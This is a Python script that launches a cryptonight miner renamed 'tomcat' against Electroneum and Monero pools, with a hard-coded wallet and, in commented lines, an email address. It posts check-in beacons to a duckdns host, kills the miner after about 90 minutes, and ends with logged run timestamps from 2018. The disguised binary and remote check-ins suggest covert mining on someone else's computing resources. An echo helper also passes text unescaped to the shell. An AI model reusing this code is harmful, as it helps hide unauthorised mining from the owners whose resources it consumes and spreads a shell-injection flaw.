import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:05:05.694925
#2018-02-17 16:51:06.159714
#2018-02-17 18:40:03.174757
#2018-02-17 20:27:07.630516
#2018-02-17 22:14:06.130533
#2018-02-17 23:58:06.519753
#2018-02-18 01:49:06.130295
#2018-02-18 03:38:06.409882
#2018-02-18 05:24:07.339949
#2018-02-18 07:17:04.074088
#2018-02-18 09:04:01.246907
#2018-02-18 10:51:05.626543
#2018-02-18 12:37:06.715212
#2018-02-18 14:23:07.398728
#2018-02-18 16:14:04.238602
#2018-02-18 18:02:05.077713
#2018-02-18 19:49:06.885940
#2018-02-18 21:37:01.371354
#2018-02-18 23:25:02.882204
#2018-02-19 01:12:01.363208
#2018-02-19 02:58:01.250584
#2018-02-19 04:45:08.571386
#2018-02-19 06:31:05.398446
#2018-02-19 08:20:07.650752
#2018-02-19 10:09:05.153776
#2018-02-19 11:58:07.744330
#2018-02-19 13:45:10.675379
#2018-02-19 15:33:07.968321
#2018-02-19 17:19:01.803456
#2018-02-19 19:06:06.632826
#2018-02-19 20:52:07.208158
#2018-02-19 22:41:05.391626
#2018-02-20 00:25:04.455075
#2018-02-20 02:12:02.155982
#2018-02-20 04:03:01.684253
#2018-02-20 05:46:01.456495
#2018-02-20 07:31:07.483183
#2018-02-20 09:16:06.661404
#2018-02-20 10:59:04.443863
#2018-02-20 12:46:13.515996
#2018-02-20 14:32:06.962765
#2018-02-20 16:18:04.694015
#2018-02-20 18:04:01.974525
#2018-02-20 19:54:02.096215
#2018-02-20 21:40:08.997630
#2018-02-20 23:21:06.927851
#2018-02-21 01:05:07.696060
#2018-02-21 02:51:07.804560
#2018-02-21 04:40:07.147507
#2018-02-21 06:27:07.623826
#2018-02-21 08:13:05.617848
#2018-02-21 10:00:13.519717
#2018-02-21 11:48:08.050873
#2018-02-21 13:40:06.854598
#2018-02-21 15:25:12.977830
#2018-02-21 17:15:06.819448
#2018-02-21 19:02:08.168134
#2018-02-21 20:48:07.201376
#2018-02-21 22:33:01.628603
#2018-02-22 00:23:02.085054
#2018-02-22 02:10:07.448816
#2018-02-22 03:55:08.897106
#2018-02-22 05:42:02.126722
#2018-02-22 07:27:06.600901
#2018-02-22 09:15:04.593271
#2018-02-22 11:02:05.598804
#2018-02-22 12:48:01.946406
#2018-02-22 14:34:10.344226
#2018-02-22 16:21:01.946549
#2018-02-22 18:08:02.236269
#2018-02-22 19:57:07.142186
#2018-02-22 21:47:07.487753
#2018-02-22 23:35:10.221149
#2018-02-23 01:24:04.235614
#2018-02-23 03:10:08.717829
#2018-02-23 04:56:01.367784
#2018-02-23 06:42:01.591024
#2018-02-23 08:32:05.707323
#2018-02-23 10:46:04.164647
#2018-02-23 12:44:07.338284
#2018-02-23 14:28:09.046207
#2018-02-23 16:18:04.664627
#2018-02-23 18:56:07.839075
#2018-02-23 20:42:08.941337
#2018-02-23 22:29:08.396063
#2018-02-24 00:16:03.685186
#2018-02-24 02:07:06.684785
#2018-02-24 03:56:07.561095
#2018-02-24 05:43:02.208872
#2018-02-24 07:36:05.236751
#2018-02-24 09:22:01.269202
#2018-02-24 11:15:05.577690
#2018-02-24 13:05:01.613828
#2018-02-24 14:53:04.206292
#2018-02-24 16:44:05.040128
#2018-02-24 18:32:07.466086
#2018-02-24 20:19:06.237477
#2018-02-24 22:13:03.780958
#2018-02-25 02:33:01.638251
#2018-02-25 06:14:01.736131
#2018-02-25 11:40:05.660175